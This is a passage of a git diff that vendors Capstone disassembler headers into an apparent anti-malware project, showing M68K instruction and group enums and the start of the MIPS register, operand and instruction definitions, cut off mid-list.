M68K_SIZE_TYPE_FPU, +} m68k_size_type; + +/// Operation size of the current instruction (NOT the actually size of instruction) +typedef struct m68k_op_size { + m68k_size_type type; + union { + m68k_cpu_size cpu_size; + m68k_fpu_size fpu_size; + }; +} m68k_op_size; + +/// The M68K instruction and it's operands +typedef struct cs_m68k { + // Number of operands of this instruction or 0 when 
instruction has no operand. + cs_m68k_op operands[M68K_OPERAND_COUNT]; ///< operands for this instruction. + m68k_op_size op_size; ///< size of data operand works on in bytes (.b, .w, .l, etc) + uint8_t op_count; ///< number of operands for the instruction +} cs_m68k; + +/// M68K instruction +typedef enum m68k_insn { + M68K_INS_INVALID = 0, + + M68K_INS_ABCD, + M68K_INS_ADD, + M68K_INS_ADDA, + M68K_INS_ADDI, + M68K_INS_ADDQ, + M68K_INS_ADDX, + M68K_INS_AND, + M68K_INS_ANDI, + M68K_INS_ASL, + M68K_INS_ASR, + M68K_INS_BHS, + M68K_INS_BLO, + M68K_INS_BHI, + M68K_INS_BLS, + M68K_INS_BCC, + M68K_INS_BCS, + M68K_INS_BNE, + M68K_INS_BEQ, + M68K_INS_BVC, + M68K_INS_BVS, + M68K_INS_BPL, + M68K_INS_BMI, + M68K_INS_BGE, + M68K_INS_BLT, + M68K_INS_BGT, + M68K_INS_BLE, + M68K_INS_BRA, + M68K_INS_BSR, + M68K_INS_BCHG, + M68K_INS_BCLR, + M68K_INS_BSET, + M68K_INS_BTST, + M68K_INS_BFCHG, + M68K_INS_BFCLR, + M68K_INS_BFEXTS, + M68K_INS_BFEXTU, + M68K_INS_BFFFO, + M68K_INS_BFINS, + M68K_INS_BFSET, + M68K_INS_BFTST, + M68K_INS_BKPT, + M68K_INS_CALLM, + M68K_INS_CAS, + M68K_INS_CAS2, + M68K_INS_CHK, + M68K_INS_CHK2, + M68K_INS_CLR, + M68K_INS_CMP, + M68K_INS_CMPA, + M68K_INS_CMPI, + M68K_INS_CMPM, + M68K_INS_CMP2, + M68K_INS_CINVL, + M68K_INS_CINVP, + M68K_INS_CINVA, + M68K_INS_CPUSHL, + M68K_INS_CPUSHP, + M68K_INS_CPUSHA, + M68K_INS_DBT, + M68K_INS_DBF, + M68K_INS_DBHI, + M68K_INS_DBLS, + M68K_INS_DBCC, + M68K_INS_DBCS, + M68K_INS_DBNE, + M68K_INS_DBEQ, + M68K_INS_DBVC, + M68K_INS_DBVS, + M68K_INS_DBPL, + M68K_INS_DBMI, + M68K_INS_DBGE, + M68K_INS_DBLT, + M68K_INS_DBGT, + M68K_INS_DBLE, + M68K_INS_DBRA, + M68K_INS_DIVS, + M68K_INS_DIVSL, + M68K_INS_DIVU, + M68K_INS_DIVUL, + M68K_INS_EOR, + M68K_INS_EORI, + M68K_INS_EXG, + M68K_INS_EXT, + M68K_INS_EXTB, + M68K_INS_FABS, + M68K_INS_FSABS, + M68K_INS_FDABS, + M68K_INS_FACOS, + M68K_INS_FADD, + M68K_INS_FSADD, + M68K_INS_FDADD, + M68K_INS_FASIN, + M68K_INS_FATAN, + M68K_INS_FATANH, + M68K_INS_FBF, + M68K_INS_FBEQ, + M68K_INS_FBOGT, + 
M68K_INS_FBOGE, + M68K_INS_FBOLT, + M68K_INS_FBOLE, + M68K_INS_FBOGL, + M68K_INS_FBOR, + M68K_INS_FBUN, + M68K_INS_FBUEQ, + M68K_INS_FBUGT, + M68K_INS_FBUGE, + M68K_INS_FBULT, + M68K_INS_FBULE, + M68K_INS_FBNE, + M68K_INS_FBT, + M68K_INS_FBSF, + M68K_INS_FBSEQ, + M68K_INS_FBGT, + M68K_INS_FBGE, + M68K_INS_FBLT, + M68K_INS_FBLE, + M68K_INS_FBGL, + M68K_INS_FBGLE, + M68K_INS_FBNGLE, + M68K_INS_FBNGL, + M68K_INS_FBNLE, + M68K_INS_FBNLT, + M68K_INS_FBNGE, + M68K_INS_FBNGT, + M68K_INS_FBSNE, + M68K_INS_FBST, + M68K_INS_FCMP, + M68K_INS_FCOS, + M68K_INS_FCOSH, + M68K_INS_FDBF, + M68K_INS_FDBEQ, + M68K_INS_FDBOGT, + M68K_INS_FDBOGE, + M68K_INS_FDBOLT, + M68K_INS_FDBOLE, + M68K_INS_FDBOGL, + M68K_INS_FDBOR, + M68K_INS_FDBUN, + M68K_INS_FDBUEQ, + M68K_INS_FDBUGT, + M68K_INS_FDBUGE, + M68K_INS_FDBULT, + M68K_INS_FDBULE, + M68K_INS_FDBNE, + M68K_INS_FDBT, + M68K_INS_FDBSF, + M68K_INS_FDBSEQ, + M68K_INS_FDBGT, + M68K_INS_FDBGE, + M68K_INS_FDBLT, + M68K_INS_FDBLE, + M68K_INS_FDBGL, + M68K_INS_FDBGLE, + M68K_INS_FDBNGLE, + M68K_INS_FDBNGL, + M68K_INS_FDBNLE, + M68K_INS_FDBNLT, + M68K_INS_FDBNGE, + M68K_INS_FDBNGT, + M68K_INS_FDBSNE, + M68K_INS_FDBST, + M68K_INS_FDIV, + M68K_INS_FSDIV, + M68K_INS_FDDIV, + M68K_INS_FETOX, + M68K_INS_FETOXM1, + M68K_INS_FGETEXP, + M68K_INS_FGETMAN, + M68K_INS_FINT, + M68K_INS_FINTRZ, + M68K_INS_FLOG10, + M68K_INS_FLOG2, + M68K_INS_FLOGN, + M68K_INS_FLOGNP1, + M68K_INS_FMOD, + M68K_INS_FMOVE, + M68K_INS_FSMOVE, + M68K_INS_FDMOVE, + M68K_INS_FMOVECR, + M68K_INS_FMOVEM, + M68K_INS_FMUL, + M68K_INS_FSMUL, + M68K_INS_FDMUL, + M68K_INS_FNEG, + M68K_INS_FSNEG, + M68K_INS_FDNEG, + M68K_INS_FNOP, + M68K_INS_FREM, + M68K_INS_FRESTORE, + M68K_INS_FSAVE, + M68K_INS_FSCALE, + M68K_INS_FSGLDIV, + M68K_INS_FSGLMUL, + M68K_INS_FSIN, + M68K_INS_FSINCOS, + M68K_INS_FSINH, + M68K_INS_FSQRT, + M68K_INS_FSSQRT, + M68K_INS_FDSQRT, + M68K_INS_FSF, + M68K_INS_FSBEQ, + M68K_INS_FSOGT, + M68K_INS_FSOGE, + M68K_INS_FSOLT, + M68K_INS_FSOLE, + M68K_INS_FSOGL, + M68K_INS_FSOR, 
+ M68K_INS_FSUN, + M68K_INS_FSUEQ, + M68K_INS_FSUGT, + M68K_INS_FSUGE, + M68K_INS_FSULT, + M68K_INS_FSULE, + M68K_INS_FSNE, + M68K_INS_FST, + M68K_INS_FSSF, + M68K_INS_FSSEQ, + M68K_INS_FSGT, + M68K_INS_FSGE, + M68K_INS_FSLT, + M68K_INS_FSLE, + M68K_INS_FSGL, + M68K_INS_FSGLE, + M68K_INS_FSNGLE, + M68K_INS_FSNGL, + M68K_INS_FSNLE, + M68K_INS_FSNLT, + M68K_INS_FSNGE, + M68K_INS_FSNGT, + M68K_INS_FSSNE, + M68K_INS_FSST, + M68K_INS_FSUB, + M68K_INS_FSSUB, + M68K_INS_FDSUB, + M68K_INS_FTAN, + M68K_INS_FTANH, + M68K_INS_FTENTOX, + M68K_INS_FTRAPF, + M68K_INS_FTRAPEQ, + M68K_INS_FTRAPOGT, + M68K_INS_FTRAPOGE, + M68K_INS_FTRAPOLT, + M68K_INS_FTRAPOLE, + M68K_INS_FTRAPOGL, + M68K_INS_FTRAPOR, + M68K_INS_FTRAPUN, + M68K_INS_FTRAPUEQ, + M68K_INS_FTRAPUGT, + M68K_INS_FTRAPUGE, + M68K_INS_FTRAPULT, + M68K_INS_FTRAPULE, + M68K_INS_FTRAPNE, + M68K_INS_FTRAPT, + M68K_INS_FTRAPSF, + M68K_INS_FTRAPSEQ, + M68K_INS_FTRAPGT, + M68K_INS_FTRAPGE, + M68K_INS_FTRAPLT, + M68K_INS_FTRAPLE, + M68K_INS_FTRAPGL, + M68K_INS_FTRAPGLE, + M68K_INS_FTRAPNGLE, + M68K_INS_FTRAPNGL, + M68K_INS_FTRAPNLE, + M68K_INS_FTRAPNLT, + M68K_INS_FTRAPNGE, + M68K_INS_FTRAPNGT, + M68K_INS_FTRAPSNE, + M68K_INS_FTRAPST, + M68K_INS_FTST, + M68K_INS_FTWOTOX, + M68K_INS_HALT, + M68K_INS_ILLEGAL, + M68K_INS_JMP, + M68K_INS_JSR, + M68K_INS_LEA, + M68K_INS_LINK, + M68K_INS_LPSTOP, + M68K_INS_LSL, + M68K_INS_LSR, + M68K_INS_MOVE, + M68K_INS_MOVEA, + M68K_INS_MOVEC, + M68K_INS_MOVEM, + M68K_INS_MOVEP, + M68K_INS_MOVEQ, + M68K_INS_MOVES, + M68K_INS_MOVE16, + M68K_INS_MULS, + M68K_INS_MULU, + M68K_INS_NBCD, + M68K_INS_NEG, + M68K_INS_NEGX, + M68K_INS_NOP, + M68K_INS_NOT, + M68K_INS_OR, + M68K_INS_ORI, + M68K_INS_PACK, + M68K_INS_PEA, + M68K_INS_PFLUSH, + M68K_INS_PFLUSHA, + M68K_INS_PFLUSHAN, + M68K_INS_PFLUSHN, + M68K_INS_PLOADR, + M68K_INS_PLOADW, + M68K_INS_PLPAR, + M68K_INS_PLPAW, + M68K_INS_PMOVE, + M68K_INS_PMOVEFD, + M68K_INS_PTESTR, + M68K_INS_PTESTW, + M68K_INS_PULSE, + M68K_INS_REMS, + M68K_INS_REMU, + 
M68K_INS_RESET, + M68K_INS_ROL, + M68K_INS_ROR, + M68K_INS_ROXL, + M68K_INS_ROXR, + M68K_INS_RTD, + M68K_INS_RTE, + M68K_INS_RTM, + M68K_INS_RTR, + M68K_INS_RTS, + M68K_INS_SBCD, + M68K_INS_ST, + M68K_INS_SF, + M68K_INS_SHI, + M68K_INS_SLS, + M68K_INS_SCC, + M68K_INS_SHS, + M68K_INS_SCS, + M68K_INS_SLO, + M68K_INS_SNE, + M68K_INS_SEQ, + M68K_INS_SVC, + M68K_INS_SVS, + M68K_INS_SPL, + M68K_INS_SMI, + M68K_INS_SGE, + M68K_INS_SLT, + M68K_INS_SGT, + M68K_INS_SLE, + M68K_INS_STOP, + M68K_INS_SUB, + M68K_INS_SUBA, + M68K_INS_SUBI, + M68K_INS_SUBQ, + M68K_INS_SUBX, + M68K_INS_SWAP, + M68K_INS_TAS, + M68K_INS_TRAP, + M68K_INS_TRAPV, + M68K_INS_TRAPT, + M68K_INS_TRAPF, + M68K_INS_TRAPHI, + M68K_INS_TRAPLS, + M68K_INS_TRAPCC, + M68K_INS_TRAPHS, + M68K_INS_TRAPCS, + M68K_INS_TRAPLO, + M68K_INS_TRAPNE, + M68K_INS_TRAPEQ, + M68K_INS_TRAPVC, + M68K_INS_TRAPVS, + M68K_INS_TRAPPL, + M68K_INS_TRAPMI, + M68K_INS_TRAPGE, + M68K_INS_TRAPLT, + M68K_INS_TRAPGT, + M68K_INS_TRAPLE, + M68K_INS_TST, + M68K_INS_UNLK, + M68K_INS_UNPK, + M68K_INS_ENDING, // <-- mark the end of the list of instructions +} m68k_insn; + +/// Group of M68K instructions +typedef enum m68k_group_type { + M68K_GRP_INVALID = 0, ///< CS_GRUP_INVALID + M68K_GRP_JUMP, ///< = CS_GRP_JUMP + M68K_GRP_RET = 3, ///< = CS_GRP_RET + M68K_GRP_IRET = 5, ///< = CS_GRP_IRET + M68K_GRP_BRANCH_RELATIVE = 7, ///< = CS_GRP_BRANCH_RELATIVE + + M68K_GRP_ENDING,// <-- mark the end of the list of groups +} m68k_group_type; + +#ifdef __cplusplus +} +#endif + +#endif diff --git a/ai_anti_malware/capstone/include/capstone/mips.h b/ai_anti_malware/capstone/include/capstone/mips.h new file mode 100644 index 0000000..f10c303 --- /dev/null +++ b/ai_anti_malware/capstone/include/capstone/mips.h @@ -0,0 +1,956 @@ +#ifndef CAPSTONE_MIPS_H +#define CAPSTONE_MIPS_H + +/* Capstone Disassembly Engine */ +/* By Nguyen Anh Quynh , 2013-2015 */ + +#ifdef __cplusplus +extern "C" { +#endif + +#include "platform.h" + +// GCC MIPS toolchain has a default 
macro called "mips" which breaks +// compilation +#undef mips + +#ifdef _MSC_VER +#pragma warning(disable:4201) +#endif + +/// Operand type for instruction's operands +typedef enum mips_op_type { + MIPS_OP_INVALID = 0, ///< = CS_OP_INVALID (Uninitialized). + MIPS_OP_REG, ///< = CS_OP_REG (Register operand). + MIPS_OP_IMM, ///< = CS_OP_IMM (Immediate operand). + MIPS_OP_MEM, ///< = CS_OP_MEM (Memory operand). +} mips_op_type; + +/// MIPS registers +typedef enum mips_reg { + MIPS_REG_INVALID = 0, + // General purpose registers + MIPS_REG_PC, + + MIPS_REG_0, + MIPS_REG_1, + MIPS_REG_2, + MIPS_REG_3, + MIPS_REG_4, + MIPS_REG_5, + MIPS_REG_6, + MIPS_REG_7, + MIPS_REG_8, + MIPS_REG_9, + MIPS_REG_10, + MIPS_REG_11, + MIPS_REG_12, + MIPS_REG_13, + MIPS_REG_14, + MIPS_REG_15, + MIPS_REG_16, + MIPS_REG_17, + MIPS_REG_18, + MIPS_REG_19, + MIPS_REG_20, + MIPS_REG_21, + MIPS_REG_22, + MIPS_REG_23, + MIPS_REG_24, + MIPS_REG_25, + MIPS_REG_26, + MIPS_REG_27, + MIPS_REG_28, + MIPS_REG_29, + MIPS_REG_30, + MIPS_REG_31, + + // DSP registers + MIPS_REG_DSPCCOND, + MIPS_REG_DSPCARRY, + MIPS_REG_DSPEFI, + MIPS_REG_DSPOUTFLAG, + MIPS_REG_DSPOUTFLAG16_19, + MIPS_REG_DSPOUTFLAG20, + MIPS_REG_DSPOUTFLAG21, + MIPS_REG_DSPOUTFLAG22, + MIPS_REG_DSPOUTFLAG23, + MIPS_REG_DSPPOS, + MIPS_REG_DSPSCOUNT, + + // ACC registers + MIPS_REG_AC0, + MIPS_REG_AC1, + MIPS_REG_AC2, + MIPS_REG_AC3, + + // COP registers + MIPS_REG_CC0, + MIPS_REG_CC1, + MIPS_REG_CC2, + MIPS_REG_CC3, + MIPS_REG_CC4, + MIPS_REG_CC5, + MIPS_REG_CC6, + MIPS_REG_CC7, + + // FPU registers + MIPS_REG_F0, + MIPS_REG_F1, + MIPS_REG_F2, + MIPS_REG_F3, + MIPS_REG_F4, + MIPS_REG_F5, + MIPS_REG_F6, + MIPS_REG_F7, + MIPS_REG_F8, + MIPS_REG_F9, + MIPS_REG_F10, + MIPS_REG_F11, + MIPS_REG_F12, + MIPS_REG_F13, + MIPS_REG_F14, + MIPS_REG_F15, + MIPS_REG_F16, + MIPS_REG_F17, + MIPS_REG_F18, + MIPS_REG_F19, + MIPS_REG_F20, + MIPS_REG_F21, + MIPS_REG_F22, + MIPS_REG_F23, + MIPS_REG_F24, + MIPS_REG_F25, + MIPS_REG_F26, + MIPS_REG_F27, + 
MIPS_REG_F28, + MIPS_REG_F29, + MIPS_REG_F30, + MIPS_REG_F31, + + MIPS_REG_FCC0, + MIPS_REG_FCC1, + MIPS_REG_FCC2, + MIPS_REG_FCC3, + MIPS_REG_FCC4, + MIPS_REG_FCC5, + MIPS_REG_FCC6, + MIPS_REG_FCC7, + + // AFPR128 + MIPS_REG_W0, + MIPS_REG_W1, + MIPS_REG_W2, + MIPS_REG_W3, + MIPS_REG_W4, + MIPS_REG_W5, + MIPS_REG_W6, + MIPS_REG_W7, + MIPS_REG_W8, + MIPS_REG_W9, + MIPS_REG_W10, + MIPS_REG_W11, + MIPS_REG_W12, + MIPS_REG_W13, + MIPS_REG_W14, + MIPS_REG_W15, + MIPS_REG_W16, + MIPS_REG_W17, + MIPS_REG_W18, + MIPS_REG_W19, + MIPS_REG_W20, + MIPS_REG_W21, + MIPS_REG_W22, + MIPS_REG_W23, + MIPS_REG_W24, + MIPS_REG_W25, + MIPS_REG_W26, + MIPS_REG_W27, + MIPS_REG_W28, + MIPS_REG_W29, + MIPS_REG_W30, + MIPS_REG_W31, + + MIPS_REG_HI, + MIPS_REG_LO, + + MIPS_REG_P0, + MIPS_REG_P1, + MIPS_REG_P2, + + MIPS_REG_MPL0, + MIPS_REG_MPL1, + MIPS_REG_MPL2, + + MIPS_REG_ENDING, // <-- mark the end of the list or registers + + // alias registers + MIPS_REG_ZERO = MIPS_REG_0, + MIPS_REG_AT = MIPS_REG_1, + MIPS_REG_V0 = MIPS_REG_2, + MIPS_REG_V1 = MIPS_REG_3, + MIPS_REG_A0 = MIPS_REG_4, + MIPS_REG_A1 = MIPS_REG_5, + MIPS_REG_A2 = MIPS_REG_6, + MIPS_REG_A3 = MIPS_REG_7, + MIPS_REG_T0 = MIPS_REG_8, + MIPS_REG_T1 = MIPS_REG_9, + MIPS_REG_T2 = MIPS_REG_10, + MIPS_REG_T3 = MIPS_REG_11, + MIPS_REG_T4 = MIPS_REG_12, + MIPS_REG_T5 = MIPS_REG_13, + MIPS_REG_T6 = MIPS_REG_14, + MIPS_REG_T7 = MIPS_REG_15, + MIPS_REG_S0 = MIPS_REG_16, + MIPS_REG_S1 = MIPS_REG_17, + MIPS_REG_S2 = MIPS_REG_18, + MIPS_REG_S3 = MIPS_REG_19, + MIPS_REG_S4 = MIPS_REG_20, + MIPS_REG_S5 = MIPS_REG_21, + MIPS_REG_S6 = MIPS_REG_22, + MIPS_REG_S7 = MIPS_REG_23, + MIPS_REG_T8 = MIPS_REG_24, + MIPS_REG_T9 = MIPS_REG_25, + MIPS_REG_K0 = MIPS_REG_26, + MIPS_REG_K1 = MIPS_REG_27, + MIPS_REG_GP = MIPS_REG_28, + MIPS_REG_SP = MIPS_REG_29, + MIPS_REG_FP = MIPS_REG_30, MIPS_REG_S8 = MIPS_REG_30, + MIPS_REG_RA = MIPS_REG_31, + + MIPS_REG_HI0 = MIPS_REG_AC0, + MIPS_REG_HI1 = MIPS_REG_AC1, + MIPS_REG_HI2 = MIPS_REG_AC2, + MIPS_REG_HI3 = 
MIPS_REG_AC3, + + MIPS_REG_LO0 = MIPS_REG_HI0, + MIPS_REG_LO1 = MIPS_REG_HI1, + MIPS_REG_LO2 = MIPS_REG_HI2, + MIPS_REG_LO3 = MIPS_REG_HI3, +} mips_reg; + +/// Instruction's operand referring to memory +/// This is associated with MIPS_OP_MEM operand type above +typedef struct mips_op_mem { + mips_reg base; ///< base register + int64_t disp; ///< displacement/offset value +} mips_op_mem; + +/// Instruction operand +typedef struct cs_mips_op { + mips_op_type type; ///< operand type + union { + mips_reg reg; ///< register value for REG operand + int64_t imm; ///< immediate value for IMM operand + mips_op_mem mem; ///< base/index/scale/disp value for MEM operand + }; +} cs_mips_op; + +/// Instruction structure +typedef struct cs_mips { + /// Number of operands of this instruction, + /// or 0 when instruction has no operand. + uint8_t op_count; + cs_mips_op operands[10]; ///< operands for this instruction. +} cs_mips; + +/// MIPS instruction +typedef enum mips_insn { + MIPS_INS_INVALID = 0, + + MIPS_INS_ABSQ_S, + MIPS_INS_ADD, + MIPS_INS_ADDIUPC, + MIPS_INS_ADDIUR1SP, + MIPS_INS_ADDIUR2, + MIPS_INS_ADDIUS5, + MIPS_INS_ADDIUSP, + MIPS_INS_ADDQH, + MIPS_INS_ADDQH_R, + MIPS_INS_ADDQ, + MIPS_INS_ADDQ_S, + MIPS_INS_ADDSC, + MIPS_INS_ADDS_A, + MIPS_INS_ADDS_S, + MIPS_INS_ADDS_U, + MIPS_INS_ADDU16, + MIPS_INS_ADDUH, + MIPS_INS_ADDUH_R, + MIPS_INS_ADDU, + MIPS_INS_ADDU_S, + MIPS_INS_ADDVI, + MIPS_INS_ADDV, + MIPS_INS_ADDWC, + MIPS_INS_ADD_A, + MIPS_INS_ADDI, + MIPS_INS_ADDIU, + MIPS_INS_ALIGN, + MIPS_INS_ALUIPC, + MIPS_INS_AND, + MIPS_INS_AND16, + MIPS_INS_ANDI16, + MIPS_INS_ANDI, + MIPS_INS_APPEND, + MIPS_INS_ASUB_S, + MIPS_INS_ASUB_U, + MIPS_INS_AUI, + MIPS_INS_AUIPC, + MIPS_INS_AVER_S, + MIPS_INS_AVER_U, + MIPS_INS_AVE_S, + MIPS_INS_AVE_U, + MIPS_INS_B16, + MIPS_INS_BADDU, + MIPS_INS_BAL, + MIPS_INS_BALC, + MIPS_INS_BALIGN, + MIPS_INS_BBIT0, + MIPS_INS_BBIT032, + MIPS_INS_BBIT1, + MIPS_INS_BBIT132, + MIPS_INS_BC, + MIPS_INS_BC0F, + MIPS_INS_BC0FL, + MIPS_INS_BC0T, + 
MIPS_INS_BC0TL, + MIPS_INS_BC1EQZ, + MIPS_INS_BC1F, + MIPS_INS_BC1FL, + MIPS_INS_BC1NEZ, + MIPS_INS_BC1T, + MIPS_INS_BC1TL, + MIPS_INS_BC2EQZ, + MIPS_INS_BC2F, + MIPS_INS_BC2FL, + MIPS_INS_BC2NEZ, + MIPS_INS_BC2T, + MIPS_INS_BC2TL, + MIPS_INS_BC3F, + MIPS_INS_BC3FL, + MIPS_INS_BC3T, + MIPS_INS_BC3TL, + MIPS_INS_BCLRI, + MIPS_INS_BCLR, + MIPS_INS_BEQ, + MIPS_INS_BEQC, + MIPS_INS_BEQL, + MIPS_INS_BEQZ16, + MIPS_INS_BEQZALC, + MIPS_INS_BEQZC, + MIPS_INS_BGEC, + MIPS_INS_BGEUC, + MIPS_INS_BGEZ, + MIPS_INS_BGEZAL, + MIPS_INS_BGEZALC, + MIPS_INS_BGEZALL, + MIPS_INS_BGEZALS, + MIPS_INS_BGEZC, + MIPS_INS_BGEZL, + MIPS_INS_BGTZ, + MIPS_INS_BGTZALC, + MIPS_INS_BGTZC, + MIPS_INS_BGTZL, + MIPS_INS_BINSLI, + MIPS_INS_BINSL, + MIPS_INS_BINSRI, + MIPS_INS_BINSR, + MIPS_INS_BITREV, + MIPS_INS_BITSWAP, + MIPS_INS_BLEZ, + MIPS_INS_BLEZALC, + MIPS_INS_BLEZC, + MIPS_INS_BLEZL, + MIPS_INS_BLTC, + MIPS_INS_BLTUC, + MIPS_INS_BLTZ, + MIPS_INS_BLTZAL, + MIPS_INS_BLTZALC, + MIPS_INS_BLTZALL, + MIPS_INS_BLTZALS, + MIPS_INS_BLTZC, + MIPS_INS_BLTZL, + MIPS_INS_BMNZI, + MIPS_INS_BMNZ, + MIPS_INS_BMZI, + MIPS_INS_BMZ, + MIPS_INS_BNE, + MIPS_INS_BNEC, + MIPS_INS_BNEGI, + MIPS_INS_BNEG, + MIPS_INS_BNEL, + MIPS_INS_BNEZ16, + MIPS_INS_BNEZALC, + MIPS_INS_BNEZC, + MIPS_INS_BNVC, + MIPS_INS_BNZ, + MIPS_INS_BOVC, + MIPS_INS_BPOSGE32, + MIPS_INS_BREAK, + MIPS_INS_BREAK16, + MIPS_INS_BSELI, + MIPS_INS_BSEL, + MIPS_INS_BSETI, + MIPS_INS_BSET, + MIPS_INS_BZ, + MIPS_INS_BEQZ, + MIPS_INS_B, + MIPS_INS_BNEZ, + MIPS_INS_BTEQZ, + MIPS_INS_BTNEZ, + MIPS_INS_CACHE, + MIPS_INS_CEIL, + MIPS_INS_CEQI, + MIPS_INS_CEQ, + MIPS_INS_CFC1, + MIPS_INS_CFCMSA, + MIPS_INS_CINS, + MIPS_INS_CINS32, + MIPS_INS_CLASS, + MIPS_INS_CLEI_S, + MIPS_INS_CLEI_U, + MIPS_INS_CLE_S, + MIPS_INS_CLE_U, + MIPS_INS_CLO, + MIPS_INS_CLTI_S, + MIPS_INS_CLTI_U, + MIPS_INS_CLT_S, + MIPS_INS_CLT_U, + MIPS_INS_CLZ, + MIPS_INS_CMPGDU, + MIPS_INS_CMPGU, + MIPS_INS_CMPU, + MIPS_INS_CMP, + MIPS_INS_COPY_S, + MIPS_INS_COPY_U, + MIPS_INS_CTC1, + 
MIPS_INS_CTCMSA, + MIPS_INS_CVT, + MIPS_INS_C, + MIPS_INS_CMPI, + MIPS_INS_DADD, + MIPS_INS_DADDI, + MIPS_INS_DADDIU, + MIPS_INS_DADDU, + MIPS_INS_DAHI, + MIPS_INS_DALIGN, + MIPS_INS_DATI, + MIPS_INS_DAUI, + MIPS_INS_DBITSWAP, + MIPS_INS_DCLO, + MIPS_INS_DCLZ, + MIPS_INS_DDIV, + MIPS_INS_DDIVU, + MIPS_INS_DERET, + MIPS_INS_DEXT, + MIPS_INS_DEXTM, + MIPS_INS_DEXTU, + MIPS_INS_DI, + MIPS_INS_DINS, + MIPS_INS_DINSM, + MIPS_INS_DINSU, + MIPS_INS_DIV, + MIPS_INS_DIVU, + MIPS_INS_DIV_S, + MIPS_INS_DIV_U, + MIPS_INS_DLSA, + MIPS_INS_DMFC0, + MIPS_INS_DMFC1, + MIPS_INS_DMFC2, + MIPS_INS_DMOD, + MIPS_INS_DMODU, + MIPS_INS_DMTC0, + MIPS_INS_DMTC1, + MIPS_INS_DMTC2, + MIPS_INS_DMUH, + MIPS_INS_DMUHU, + MIPS_INS_DMUL, + MIPS_INS_DMULT, + MIPS_INS_DMULTU, + MIPS_INS_DMULU, + MIPS_INS_DOTP_S, + MIPS_INS_DOTP_U, + MIPS_INS_DPADD_S, + MIPS_INS_DPADD_U, + MIPS_INS_DPAQX_SA, + MIPS_INS_DPAQX_S, + MIPS_INS_DPAQ_SA, + MIPS_INS_DPAQ_S, + MIPS_INS_DPAU, + MIPS_INS_DPAX, + MIPS_INS_DPA, + MIPS_INS_DPOP, + MIPS_INS_DPSQX_SA, + MIPS_INS_DPSQX_S, + MIPS_INS_DPSQ_SA, + MIPS_INS_DPSQ_S, + MIPS_INS_DPSUB_S, + MIPS_INS_DPSUB_U, + MIPS_INS_DPSU, + MIPS_INS_DPSX, + MIPS_INS_DPS, + MIPS_INS_DROTR, + MIPS_INS_DROTR32, + MIPS_INS_DROTRV, + MIPS_INS_DSBH, + MIPS_INS_DSHD, + MIPS_INS_DSLL, + MIPS_INS_DSLL32, + MIPS_INS_DSLLV, + MIPS_INS_DSRA, + MIPS_INS_DSRA32, + MIPS_INS_DSRAV, + MIPS_INS_DSRL, + MIPS_INS_DSRL32, + MIPS_INS_DSRLV, + MIPS_INS_DSUB, + MIPS_INS_DSUBU, + MIPS_INS_EHB, + MIPS_INS_EI, + MIPS_INS_ERET, + MIPS_INS_EXT, + MIPS_INS_EXTP, + MIPS_INS_EXTPDP, + MIPS_INS_EXTPDPV, + MIPS_INS_EXTPV, + MIPS_INS_EXTRV_RS, + MIPS_INS_EXTRV_R, + MIPS_INS_EXTRV_S, + MIPS_INS_EXTRV, + MIPS_INS_EXTR_RS, + MIPS_INS_EXTR_R, + MIPS_INS_EXTR_S, + MIPS_INS_EXTR, + MIPS_INS_EXTS, + MIPS_INS_EXTS32, + MIPS_INS_ABS, + MIPS_INS_FADD, + MIPS_INS_FCAF, + MIPS_INS_FCEQ, + MIPS_INS_FCLASS, + MIPS_INS_FCLE, + MIPS_INS_FCLT, + MIPS_INS_FCNE, + MIPS_INS_FCOR, + MIPS_INS_FCUEQ, + MIPS_INS_FCULE, + MIPS_INS_FCULT, + 
MIPS_INS_FCUNE, + MIPS_INS_FCUN, + MIPS_INS_FDIV, + MIPS_INS_FEXDO, + MIPS_INS_FEXP2, + MIPS_INS_FEXUPL, + MIPS_INS_FEXUPR, + MIPS_INS_FFINT_S, + MIPS_INS_FFINT_U, + MIPS_INS_FFQL, + MIPS_INS_FFQR, + MIPS_INS_FILL, + MIPS_INS_FLOG2, + MIPS_INS_FLOOR, + MIPS_INS_FMADD, + MIPS_INS_FMAX_A, + MIPS_INS_FMAX, + MIPS_INS_FMIN_A, + MIPS_INS_FMIN, + MIPS_INS_MOV, + MIPS_INS_FMSUB, + MIPS_INS_FMUL, + MIPS_INS_MUL, + MIPS_INS_NEG, + MIPS_INS_FRCP, + MIPS_INS_FRINT, + MIPS_INS_FRSQRT, + MIPS_INS_FSAF, + MIPS_INS_FSEQ, + MIPS_INS_FSLE, + MIPS_INS_FSLT, + MIPS_INS_FSNE, + MIPS_INS_FSOR, + MIPS_INS_FSQRT, + MIPS_INS_SQRT, + MIPS_INS_FSUB, + MIPS_INS_SUB, + MIPS_INS_FSUEQ, + MIPS_INS_FSULE, + MIPS_INS_FSULT, + MIPS_INS_FSUNE, + MIPS_INS_FSUN, + MIPS_INS_FTINT_S, + MIPS_INS_FTINT_U, + MIPS_INS_FTQ, + MIPS_INS_FTRUNC_S, + MIPS_INS_FTRUNC_U, + MIPS_INS_HADD_S, + MIPS_INS_HADD_U, + MIPS_INS_HSUB_S, + MIPS_INS_HSUB_U, + MIPS_INS_ILVEV, + MIPS_INS_ILVL, + MIPS_INS_ILVOD, + MIPS_INS_ILVR, + MIPS_INS_INS, + MIPS_INS_INSERT, + MIPS_INS_INSV, + MIPS_INS_INSVE, + MIPS_INS_J, + MIPS_INS_JAL, + MIPS_INS_JALR, + MIPS_INS_JALRS16, + MIPS_INS_JALRS, + MIPS_INS_JALS, + MIPS_INS_JALX, + MIPS_INS_JIALC, + MIPS_INS_JIC, + MIPS_INS_JR, + MIPS_INS_JR16, + MIPS_INS_JRADDIUSP, + MIPS_INS_JRC, + MIPS_INS_JALRC, + MIPS_INS_LB, + MIPS_INS_LBU16, + MIPS_INS_LBUX, + MIPS_INS_LBU, + MIPS_INS_LD, + MIPS_INS_LDC1, + MIPS_INS_LDC2, + MIPS_INS_LDC3, + MIPS_INS_LDI, + MIPS_INS_LDL, + MIPS_INS_LDPC, + MIPS_INS_LDR, + MIPS_INS_LDXC1, + MIPS_INS_LH, + MIPS_INS_LHU16, + MIPS_INS_LHX, + MIPS_INS_LHU, + MIPS_INS_LI16, + MIPS_INS_LL, + MIPS_INS_LLD, + MIPS_INS_LSA, + MIPS_INS_LUXC1, + MIPS_INS_LUI, + MIPS_INS_LW, + MIPS_INS_LW16, + MIPS_INS_LWC1, + MIPS_INS_LWC2, + MIPS_INS_LWC3, + MIPS_INS_LWL, + MIPS_INS_LWM16, + MIPS_INS_LWM32, + MIPS_INS_LWPC, + MIPS_INS_LWP, + 